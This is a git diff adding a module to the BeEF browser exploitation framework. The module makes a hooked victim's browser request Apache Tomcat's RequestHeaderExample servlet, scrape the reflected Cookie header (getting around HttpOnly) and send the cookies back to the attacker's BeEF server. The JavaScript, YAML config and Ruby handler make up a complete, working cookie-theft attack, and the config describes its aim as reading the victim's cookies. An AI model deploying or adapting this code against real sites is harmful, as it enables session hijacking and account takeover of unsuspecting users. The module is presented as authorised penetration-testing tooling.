diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js new file mode 100644 index 000000000..7f4ca4882 --- /dev/null +++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js @@ -0,0 +1,53 @@ +// +// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + request_header_servlet_path = "<%= @request_header_servlet_path %>"; + + function parseResponse() { + var cookie_dict = {}; + + if (xhr.readyState == 4) { + if (xhr.status == 404) { + beef.debug("[apache_tomcat_examples_cookie_disclosure] RequestHeaderExample not found"); + return; + } + + if (xhr.status != 200) { + beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected HTTP response status " + xhr.status) + return; + } + + if (!xhr.responseText) { + beef.debug("[apache_tomcat_examples_cookie_disclosure] No response content") + return; + } + + beef.debug("[apache_tomcat_examples_cookie_disclosure] Received HTML content (" + xhr.responseText.length + " bytes)"); + + var content = xhr.responseText.replace(/\r|\n/g,'').match(/(.+)<\/table>/)[0]; + + if (!content || !content.length) { + beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected response: No HTML table in response") + return; + } + + var cookies = content.match(/cookie<\/td>(.+)<\/td>?/)[1].split('; '); + for (var i=0; i", <%= @command_id %>, "cookies=" + result); + } + } + + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = parseResponse; + xhr.open("GET", request_header_servlet_path, true); + xhr.send(); +}); diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml new file mode 100644 index 000000000..ca5005911 --- /dev/null +++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + apache_tomcat_examples_cookie_disclosure: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Apache Tomcat RequestHeaderExample Cookie Disclosure" + description: "This module uses the Apache Tomcat examples web app (if installed) in order to read the victim's cookies, even if issued with the HttpOnly attribute." + authors: ["bcoles"] + target: + working: ["All"] diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb new file mode 100644 index 000000000..05c96fbf7 --- /dev/null +++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command + + def self.options + [ + {'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'}, + ] + end + + def post_execute + content = {} + content['cookies'] = @datastore['cookies'] + save content + end +end